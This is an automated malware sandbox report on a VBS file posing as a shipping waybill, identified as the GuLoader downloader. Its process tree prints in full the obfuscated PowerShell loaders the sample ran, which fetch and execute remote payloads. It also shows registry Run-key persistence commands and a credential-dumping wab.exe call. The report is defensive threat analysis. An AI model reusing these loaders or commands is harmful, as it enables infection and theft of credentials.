Overview

overview

10

Static

static

1

awb_shippi...B).vbs

windows7-x64

8

awb_shippi...B).vbs

windows10-2004-x64

10

Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240611-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system
  • submitted
    01-07-2024 10:04

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs

  • Size

    22KB

  • MD5

    a13172a0f0e7ac4d5f957050221d7e3f

  • SHA1

    c81809f26230427879daf37de42163b1731018ad

  • SHA256

    e8a3dc3bf71a6dbdc2ab8beb59a9b435626d67d1596a4dc4dbfbc7c8978e74f2

  • SHA512

    52feaccccb0ff8973f8c7bff8f1ca450c57351978778590c67ec5bb91025aa99d8011819f315806d1f580b87883e0ab36717b2f61c913945b20685ca048f0ef2

  • SSDEEP

    384:AlzV6m2So022lGP9V6+s0flKJpl/5ZrE5HVnS0Re7PIx+5lEPmgwwP4WUUWUfLsA:0zSR022X/523S0e8xPPm+K1hmrRWK

Score
10/10
guloadercollectiondownloaderpersistence

Malware Config

Signatures

  • Guloader,Cloudeye

    A shellcode based downloader first seen in 2020.

    downloaderguloader
  • NirSoft MailPassView 1 IoCs

    Password recovery tool for various email clients

  • NirSoft WebBrowserPassView 1 IoCs

    Password recovery tool for various web browsers

  • Nirsoft 3 IoCs
  • Blocklisted process makes network request 3 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
    collection
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious use of NtCreateThreadExHideFromDebugger 4 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 33 IoCs
  • Suspicious behavior: MapViewOfSection 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 62 IoCs

Processes

  • C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\awb_shipping_post_01072024224782020031808174CN18010724000000124(991KB).vbs"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4732
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55 Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55';If (${host}.CurrentCulture) {$Benzoid99++;}Function aflsningsdag($Udstyknngslov){$Epidotes=$Udstyknngslov.Length-$Benzoid99;$Ssterorganisationens='SUBsTRI';$Ssterorganisationens+='ng';For( $Abrogating=1;$Abrogating -lt $Epidotes;$Abrogating+=2){$Triakisoctahedron+=$Udstyknngslov.$Ssterorganisationens.Invoke( $Abrogating, $Benzoid99);}$Triakisoctahedron;}function Cykelturernes($Pediadontic){ & ($Klimaforandring) ($Pediadontic);}$Modificerende=aflsningsdag ',M oOzBiSl lAa /P5v.F0 P( W,i n d o,w,sr .N TK E1 0 .E0P;R .W iMnM6A4N; .x.6M4S; JrGvr:,1G2L1 .,0G)u ,GUeScRkOo /C2 0.1W0I0U1 0,1 HF iSrKeBfSo xK/M1S2F1S.Z0 ';$Propinquitatis=aflsningsdag 'UUOsSe,rA- ASg eSnUt. ';$Lisys=aflsningsdag '.h t t p sd:B/E/ e vRoBlKu xHcBo n,t.a,beiMl iPd a,d e . cAoSm,.,b,r /UJPU.L Y /FTPeMkBs tElSsRnTi n g sA1S1 8 .tj aSvLaT>.h,t tAp,sA:m/G/AeBuPr o,-Rf,i eDrW- vMeGcThUiA.MrNoL/PTUeIk,sut.l,s.nsi,n g s 1S1 8S.BjGa vRa, ';$Paracress=aflsningsdag ' >K ';$Klimaforandring=aflsningsdag ' i eBx. ';$alarmeret='vindrosen';$Giftefogeder = aflsningsdag 'HeEcSh o ,%,aMpUpMd aSt a %S\,Gfl,eMiDrS. UAn dP V& &, .e c h oS KtR ';Cykelturernes (aflsningsdag 'V$,g lPoSb,a lG: I,nSt,eDr p.e rSmDe.a.tDe,dB=.( c mRdT A/FcT S$cGDi fTt,eSf.o g e dDeAr.) ');Cykelturernes (aflsningsdag '.$Mg l o,bDaLl,: S tPrco fIe r s.=V$ L iRsLyEs .UsSpjl i,t ( $RP aHr aHc r.eAsVss)S ');Cykelturernes (aflsningsdag ' [ NAe.tB.,S esrHv,i.cNeTPIoFi,n tTM,acn aTgSe r.].:,:CSSe cSu r.iStOyRP.r,oEt oSc,oFl B= ,[ N.e tE..Spe cpuDr,iSt yKP r oDtSo cMoDl T,y p,eK] :.:DT lEsK1 2V ');$Lisys=$Strofers[0];$Abrogatingnvertedly= (aflsningsdag 'E$MgBl o bSarlA:,aOa bMn.e r = N e wS-EO,bAj e,c.t .SMyFs t e.m .SN eSt .NWHePb.C lTiPe nat');$Abrogatingnvertedly+=$Interpermeated[1];Cykelturernes ($Abrogatingnvertedly);Cykelturernes (aflsningsdag ' $Pa,aNb,n e.r .SH.e.a dUeCr s [ $.P r obpPi n qSu,iSt,aStti su] = $oMKo dMi fti cFeTr e,n dDeG ');$Mammaliferous=aflsningsdag 'b$ aSa bDn.eTr .FDMoSw n lPoLa dUFLial e ( $SL i sAyPsS, $ A dSeGl.aSr.t h rBo sFo m.aIt.oMu s ), ';$Adelarthrosomatous=$Interpermeated[0];Cykelturernes (aflsningsdag ' $pg,l,oBb,a.l :mSKu geePk oFpDp ean =b( T e,s t,-PPMaTt h. S$ APdSe lTa r t h r o,sAo,mNa thoIu,sT), ');while (!$Sugekoppen) {Cykelturernes (aflsningsdag 'P$HgPl oTbnaTl,:.SCt.a,k k eIr,=B$,t rAuAeR ') ;Cykelturernes $Mammaliferous;Cykelturernes (aflsningsdag 'RSMt aHrRt,-GSIlLe.eUp F4 ');Cykelturernes (aflsningsdag ',$,gRlOoIbBa,lD:RS u g eBk o.p pSean = ( T eks tB-,P.a,t h C$MA dReSl.a,r t h r.o sUoTmCa tBoSuFs ). ') ;Cykelturernes (aflsningsdag '.$Ug,lHo bKaHl.:bC h.a d owr eTr.= $.g lTo bSa l :,C ePnFt r i f u gPa l kIr fKt.e.r,nPe.s.+S+ % $ S tPrVo f eBrFsP.Jc o u.n tF ') ;$Lisys=$Strofers[$Chadorer];}$falskneriers=354252;$Parfumen=27076;Cykelturernes (aflsningsdag ' $ gcl oNb aIlE: SOhUaEn.tKu n,gMs,fSrOa.kNkUeC .=S SG.e tS-MCro n t.e.n tG D$.ATdSeKlpa,rJtOh r oCsGo mPaFt oSu s, ');Cykelturernes (aflsningsdag ' $ g.l o bBaAlG: ESl e kSt r o.t eSkBn iCk.eIr nHeM2E3E9U m= [MS y,s.tUe.mH. C oAnPv,eErTt ] :,:,F.rLo mRB aPsBe 6 4 S t r irn gD(K$,S h.a,nBtCu.nbg sSf r,aSkSk eF)S ');Cykelturernes (aflsningsdag 'D$ gol,oUbTa,lB:UL eFg s s=t C[RS yAs,t.e m . TPe,x.t . E n c o,dSi n gS]S:U: ATS C,I Id.SGReAtPSOtUrGi nRgF(.$.E l eDk tOr oFtBeOkSnUiGkPedr n,eD2D3 9F) ');Cykelturernes (aflsningsdag 'A$.gAllo bAaRlB: T e,r pMe.n tFiAnNh,o,l dAiSgRe.=,$EL,eTg.s . s,uHbss tHrSi n.g (A$AfKa l s kInSe rAi eGrSs,, $ PFa r fFu,mSeBn.)T ');Cykelturernes $Terpentinholdige;"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:1660
      • C:\Windows\system32\cmd.exe
        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Gleir.Und && echo t"
        3⤵
          PID:708
        • C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55 Triakisoctahedron Centrifugalkrfternes Chadorer Strofers Lisys Catalogia Blodprvernes vindrosen Shantungsfrakke Dataformaters Doublehorned Legs Boomene Lakridskonfekter Forindstiller Vgterens Underskriftindsmlingens Uerfarne Blyholdigere Electively236 Casualist Adelarthrosomatous Superpowers Torgnys55';If (${host}.CurrentCulture) {$Benzoid99++;}Function aflsningsdag($Udstyknngslov){$Epidotes=$Udstyknngslov.Length-$Benzoid99;$Ssterorganisationens='SUBsTRI';$Ssterorganisationens+='ng';For( $Abrogating=1;$Abrogating -lt $Epidotes;$Abrogating+=2){$Triakisoctahedron+=$Udstyknngslov.$Ssterorganisationens.Invoke( $Abrogating, $Benzoid99);}$Triakisoctahedron;}function Cykelturernes($Pediadontic){ & ($Klimaforandring) ($Pediadontic);}$Modificerende=aflsningsdag ',M oOzBiSl lAa /P5v.F0 P( W,i n d o,w,sr .N TK E1 0 .E0P;R .W iMnM6A4N; .x.6M4S; JrGvr:,1G2L1 .,0G)u ,GUeScRkOo /C2 0.1W0I0U1 0,1 HF iSrKeBfSo xK/M1S2F1S.Z0 ';$Propinquitatis=aflsningsdag 'UUOsSe,rA- ASg eSnUt. ';$Lisys=aflsningsdag '.h t t p sd:B/E/ e vRoBlKu xHcBo n,t.a,beiMl iPd a,d e . cAoSm,.,b,r /UJPU.L Y /FTPeMkBs tElSsRnTi n g sA1S1 8 .tj aSvLaT>.h,t tAp,sA:m/G/AeBuPr o,-Rf,i eDrW- vMeGcThUiA.MrNoL/PTUeIk,sut.l,s.nsi,n g s 1S1 8S.BjGa vRa, ';$Paracress=aflsningsdag ' >K ';$Klimaforandring=aflsningsdag ' i eBx. ';$alarmeret='vindrosen';$Giftefogeder = aflsningsdag 'HeEcSh o ,%,aMpUpMd aSt a %S\,Gfl,eMiDrS. UAn dP V& &, .e c h oS KtR ';Cykelturernes (aflsningsdag 'V$,g lPoSb,a lG: I,nSt,eDr p.e rSmDe.a.tDe,dB=.( c mRdT A/FcT S$cGDi fTt,eSf.o g e dDeAr.) ');Cykelturernes (aflsningsdag '.$Mg l o,bDaLl,: S tPrco fIe r s.=V$ L iRsLyEs .UsSpjl i,t ( $RP aHr aHc r.eAsVss)S ');Cykelturernes (aflsningsdag ' [ NAe.tB.,S esrHv,i.cNeTPIoFi,n tTM,acn aTgSe r.].:,:CSSe cSu r.iStOyRP.r,oEt oSc,oFl B= ,[ N.e tE..Spe cpuDr,iSt yKP r oDtSo cMoDl T,y p,eK] :.:DT lEsK1 2V ');$Lisys=$Strofers[0];$Abrogatingnvertedly= (aflsningsdag 'E$MgBl o bSarlA:,aOa bMn.e r = N e wS-EO,bAj e,c.t .SMyFs t e.m .SN eSt .NWHePb.C lTiPe nat');$Abrogatingnvertedly+=$Interpermeated[1];Cykelturernes ($Abrogatingnvertedly);Cykelturernes (aflsningsdag ' $Pa,aNb,n e.r .SH.e.a dUeCr s [ $.P r obpPi n qSu,iSt,aStti su] = $oMKo dMi fti cFeTr e,n dDeG ');$Mammaliferous=aflsningsdag 'b$ aSa bDn.eTr .FDMoSw n lPoLa dUFLial e ( $SL i sAyPsS, $ A dSeGl.aSr.t h rBo sFo m.aIt.oMu s ), ';$Adelarthrosomatous=$Interpermeated[0];Cykelturernes (aflsningsdag ' $pg,l,oBb,a.l :mSKu geePk oFpDp ean =b( T e,s t,-PPMaTt h. S$ APdSe lTa r t h r o,sAo,mNa thoIu,sT), ');while (!$Sugekoppen) {Cykelturernes (aflsningsdag 'P$HgPl oTbnaTl,:.SCt.a,k k eIr,=B$,t rAuAeR ') ;Cykelturernes $Mammaliferous;Cykelturernes (aflsningsdag 'RSMt aHrRt,-GSIlLe.eUp F4 ');Cykelturernes (aflsningsdag ',$,gRlOoIbBa,lD:RS u g eBk o.p pSean = ( T eks tB-,P.a,t h C$MA dReSl.a,r t h r.o sUoTmCa tBoSuFs ). ') ;Cykelturernes (aflsningsdag '.$Ug,lHo bKaHl.:bC h.a d owr eTr.= $.g lTo bSa l :,C ePnFt r i f u gPa l kIr fKt.e.r,nPe.s.+S+ % $ S tPrVo f eBrFsP.Jc o u.n tF ') ;$Lisys=$Strofers[$Chadorer];}$falskneriers=354252;$Parfumen=27076;Cykelturernes (aflsningsdag ' $ gcl oNb aIlE: SOhUaEn.tKu n,gMs,fSrOa.kNkUeC .=S SG.e tS-MCro n t.e.n tG D$.ATdSeKlpa,rJtOh r oCsGo mPaFt oSu s, ');Cykelturernes (aflsningsdag ' $ g.l o bBaAlG: ESl e kSt r o.t eSkBn iCk.eIr nHeM2E3E9U m= [MS y,s.tUe.mH. C oAnPv,eErTt ] :,:,F.rLo mRB aPsBe 6 4 S t r irn gD(K$,S h.a,nBtCu.nbg sSf r,aSkSk eF)S ');Cykelturernes (aflsningsdag 'D$ gol,oUbTa,lB:UL eFg s s=t C[RS yAs,t.e m . TPe,x.t . E n c o,dSi n gS]S:U: ATS C,I Id.SGReAtPSOtUrGi nRgF(.$.E l eDk tOr oFtBeOkSnUiGkPedr n,eD2D3 9F) ');Cykelturernes (aflsningsdag 'A$.gAllo bAaRlB: T e,r pMe.n tFiAnNh,o,l dAiSgRe.=,$EL,eTg.s . s,uHbss tHrSi n.g (A$AfKa l s kInSe rAi eGrSs,, $ PFa r fFu,mSeBn.)T ');Cykelturernes $Terpentinholdige;"
          3⤵
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Suspicious use of SetThreadContext
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious behavior: MapViewOfSection
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:3788
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Gleir.Und && echo t"
            4⤵
              PID:2116
            • C:\Program Files (x86)\windows mail\wab.exe
              "C:\Program Files (x86)\windows mail\wab.exe"
              4⤵
              • Suspicious use of NtCreateThreadExHideFromDebugger
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • Suspicious use of SetThreadContext
              • Modifies registry class
              • Suspicious behavior: MapViewOfSection
              • Suspicious use of SetWindowsHookEx
              • Suspicious use of WriteProcessMemory
              PID:1364
              • C:\Windows\SysWOW64\cmd.exe
                "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemander" /t REG_EXPAND_SZ /d "%Maximized250% -w 1 $Perimyelitis=(Get-ItemProperty -Path 'HKCU:\Koncessionshaverens\').Logoernes;%Maximized250% ($Perimyelitis)"
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:916
                • C:\Windows\SysWOW64\reg.exe
                  REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bemander" /t REG_EXPAND_SZ /d "%Maximized250% -w 1 $Perimyelitis=(Get-ItemProperty -Path 'HKCU:\Koncessionshaverens\').Logoernes;%Maximized250% ($Perimyelitis)"
                  6⤵
                  • Adds Run key to start application
                  • Modifies registry key
                  PID:1600
              • C:\Windows\SysWOW64\WScript.exe
                "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Poodle.vbs"
                5⤵
                • Blocklisted process makes network request
                • Checks computer location settings
                • Suspicious use of WriteProcessMemory
                PID:1064
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
                  6⤵
                  • Blocklisted process makes network request
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  • Suspicious use of WriteProcessMemory
                  PID:4240
                  • C:\Windows\SysWOW64\cmd.exe
                    "C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
                    7⤵
                      PID:3488
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte Commixed Stines Androcratic Bertolonia Bestemmelsesstedets Compunct Tydelighed Afdelingsingenirs183 Dorte103 Antiksamlingen Undivisiveness255 Lienectomies Unpreying Pantets Photometrically Pyorrheas luske bortskaffelserne Trassenters Localizations Brumstone Citronsommerfuglens Dikamalli Amebocyte';$Stileemnets = 1;Function Alert($Catoptrical){$Dispropriate=$Catoptrical.Length-$Stileemnets;$Cohesions='SUBSTRIN';$Cohesions+='G';For( $Kaliumklorider=1;$Kaliumklorider -lt $Dispropriate;$Kaliumklorider+=2){$Commixed+=$Catoptrical.$Cohesions.Invoke( $Kaliumklorider, $Stileemnets);}$Commixed;}function Xylografien($Disharmoner){ . ($Dragemanden) ($Disharmoner);}$Cigale=Alert 'PMSomzUiRlBlOaA/B5.. 0S b(TW iSnAdVoUwCsG .NrT 1 0D.S0 ;P .WsiOnX6U4N;, .x 6L4C; r,vF:.1 2T1 . 0B)O BG,ePc k o,/ 2U0 1T0u0S1A0N1. SF.i.rme f,o xD/ 1M2F1 .,0 ';$belieffulness=Alert ' U sHeFr.-TAtg eTnGtP ';$Bestemmelsesstedets=Alert ' hKt.t pHs : / / e.v,oMl.uBxGcFoTnWt.aEbSi.l iFd aEd e .,cKo ml. b rO/.x l oKaAd /FRPuHm nSe r . xot pT ';$Voldtog=Alert 'K>N ';$Dragemanden=Alert ' iGecx, ';$Sydvestenvinds='Afdelingsingenirs183';$Anglisterne = Alert ' eAcAh o %QaVpSpEdKa tGaP%o\BbCeElSe m nPo.iSdBeMaI.OF o,s, ,& & PeDc hPod t ';Xylografien (Alert 'D$ gKl oTbBa lS: FTo r r.eBtAn i,nUg sIocmIr,aUaFdBefr =B( c.mDd. / cB ,$AA nCg l,itsKt e,r nDe ) ');Xylografien (Alert '.$bg.lCo,b aKlQ:HBJe,rBtHo.lKo nDi.a =G$ B e s t,e mKm eKlSs eCsHsSt eOd,e tBs,. sUpSlNi tP(R$,V o.l d tEo gU)R ');Xylografien (Alert ' [ NOe tZ.LS eIr.vBiAc.eSP oCi,n tcMoa.n.aagIeer ]P:D:,S ePc u.rSiot.y PfrPo tFo c,o lB C=, B[HN e t..ESBe cSuSrFiStkyBPjr,o,t.o,cRo lUT y.p,eA] : :DT.lFsM1 2. ');$Bestemmelsesstedets=$Bertolonia[0];$Ghoulishness= (Alert 'S$LgPlUoRb.a.l.:AS.kMo v hSyPt t eSn 9.8.= NUe.wR- O.bAjTeBc t, S y sBt,ePm . NAeTt . WLe b C l.i eKnPt');$Ghoulishness+=$Forretningsomraader[1];Xylografien ($Ghoulishness);Xylografien (Alert '.$ STk o v.hBy t.tKe nS9.8U..HFeHa d ePrBsG[G$DbCe,l.iSe fMf,uLl nHeAsHs.].= $ Cpi g a.lSeS ');$Jacuaru=Alert 'S$ S,kBo vTh,yFt.t eUn,9 8F.UD,o.wfnNl.o,afdTF.iRl,e (C$RBTeAsVtLe m,mTeDl s e sosst eKdBe.tBs ,D$KC iTtTrmoUnNsAo m,m e,r fGuSgElMe n sI). ';$Citronsommerfuglens=$Forretningsomraader[0];Xylografien (Alert ' $SgUl,o b a.l : L,aTv.eInGdUe lSeTn =B(MT e sAtO-IPVa.tIhB B$FCBiPtSr oHngsBoSmIm.ePrPfLuFg.l.ePn sG) ');while (!$Lavendelen) {Xylografien (Alert ' $tg l,oCb,aOl :,DSuPbbl,eJe.r n eR= $NtDrSureF ') ;Xylografien $Jacuaru;Xylografien (Alert ' S tPaMrKtN- SBl e e ps ,4. ');Xylografien (Alert 'C$Dg.l oEb a lH: LPaDv eTn dieGl eOnd=P(.TOe sDtP- P.aStph B$FCFi t rDo.nUs,okmCm ePrPfYugg lAe,n sS)U ') ;Xylografien (Alert 'I$Gg.lboNbMa l :aAHn,dHr.oEcKrHa tOi.cO=A$Sg l oSb a lJ:kSCt,iAn ePsD+ +s%U$ BVeUrHtAo,l oDn,i a ..c oHu n tS ') ;$Bestemmelsesstedets=$Bertolonia[$Androcratic];}$Nonapprehensibility=372684;$Phytin=25966;Xylografien (Alert 'F$ gPl oSb a l :kD onr.t.eM1 0 3 R= FGBe tD-,C.oPnItJeLnFt. S$ C i tFr o nDsKoUm mFe r f.uBgul,eKn s ');Xylografien (Alert 'U$ gAl.oPb.aHl :HEGmFaKnscSi,pBaQtBe B=l [DSDyPsStDeSmH. CsoOnTvLeFr t,]N:B:.FSr,o,m,B a s.e,6u4RS.tNrsi,nagA(W$ DRo r t e 1H0 3S), ');Xylografien (Alert 'I$Bg lSoIbNaBl : L,iTeLnPeCcCtmoSmSiPeRsK =. .[SS yVs t,eIm..VTYe x tS. E,n c,o dIi n g ],:.: A,SOCNIPIM.BGAe,t SItHr i n g (,$UE mBa n cPiRp.aBtDeS)A ');Xylografien (Alert ' $ gPl.ombTaVl.:.SPk rov e b.e lSg nSiMn g e nF= $ L i.e,nae cEtPoSmPi eksA.GsCu b,s tCr i.nOgK(T$bNBoBnDaHpPp rPe hSe.n.sdiAb,i lMi tAy.,,$ PHh yVtBiLn )E ');Xylografien $Skrvebelgningen;"
                      7⤵
                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                      • Suspicious use of SetThreadContext
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious behavior: MapViewOfSection
                      • Suspicious use of AdjustPrivilegeToken
                      • Suspicious use of WriteProcessMemory
                      PID:5056
                      • C:\Windows\SysWOW64\cmd.exe
                        "C:\Windows\system32\cmd.exe" /c "echo %appdata%\belemnoidea.Fos && echo t"
                        8⤵
                          PID:4852
                        • C:\Program Files (x86)\windows mail\wab.exe
                          "C:\Program Files (x86)\windows mail\wab.exe"
                          8⤵
                          • Suspicious use of NtCreateThreadExHideFromDebugger
                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                          • Suspicious behavior: EnumeratesProcesses
                          • Suspicious use of WriteProcessMemory
                          PID:2612
                          • C:\Windows\SysWOW64\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
                            9⤵
                            • Suspicious use of WriteProcessMemory
                            PID:4416
                            • C:\Windows\SysWOW64\reg.exe
                              REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Rollingerne" /t REG_EXPAND_SZ /d "%Montuvio% -w 1 $Lkapsler=(Get-ItemProperty -Path 'HKCU:\overdeferential\').retoucheres;%Montuvio% ($Lkapsler)"
                              10⤵
                              • Adds Run key to start application
                              • Modifies registry key
                              PID:1368
                  • C:\Program Files (x86)\windows mail\wab.exe
                    "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\Admin\AppData\Local\Temp\xmhwhyibjqyuma"
                    5⤵
                    • Suspicious behavior: EnumeratesProcesses
                    PID:4504
